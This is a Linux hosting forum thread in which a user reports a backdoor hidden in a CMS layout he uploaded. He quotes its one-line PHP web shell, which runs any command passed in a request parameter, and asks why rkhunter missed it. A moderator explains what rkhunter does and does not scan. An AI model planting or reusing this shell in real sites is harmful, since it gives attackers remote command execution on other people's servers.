Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 3 > Developers' Forum

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Thread Tools Display Modes
Old 25th February 2012, 16:00
lanceq lanceq is offline
Junior Member
Join Date: Dec 2011
Posts: 7
Thanks: 0
Thanked 0 Times in 0 Posts
Default why rkhunter not detected this backdoor

Yesterday someone sent me the layout of the CMS, i upload it to my server, including the layout was a backdoor Thumbs.php file, this file contains:
<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>
It seems to me that this backdoor exactly:


This person has execute this script by adress.com/layout/layoutname/img/Thumbs.php and removed all the files in that directory.

I have ispconfig, why rkhunter did not block this backdoor?
I thought these programs with ispconfig will protect me from the backdoor
Reply With Quote
Sponsored Links
Old 26th February 2012, 13:06
falko falko is offline
Super Moderator
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 41,701
Thanks: 1,900
Thanked 2,749 Times in 2,579 Posts

First, rkhunter doesn't remove anything - it just detects malware, trojans, etc., and warns you.

Second, it doesn't check PHP scripts (how should this work? How should it know the hash of a bad PHP script that someone uploads to your server?).
Download the ISPConfig 3 Manual! | Check out the ISPConfig 3 Billing Module!

FB: http://www.facebook.com/howtoforge

nginx-Webhosting: Timme Hosting | Follow me on:
Reply With Quote


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
fail2ban.filter : INFO Log rotation detected for /var/log/mail.log dynamind Installation/Configuration 1 18th July 2011 10:53
LXC containers as VM's for ISPConfig 3 - First steps & quick start. CSsab Tips/Tricks/Mods 6 7th February 2011 17:14
Autoresponder Not working b00gz Installation/Configuration 10 28th October 2010 22:58
Please review RKHUNTER Log jmh_fl General 1 27th April 2010 17:44
rkhunter Messages atjensen11 Installation/Configuration 0 16th September 2009 18:59

All times are GMT +2. The time now is 19:26.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.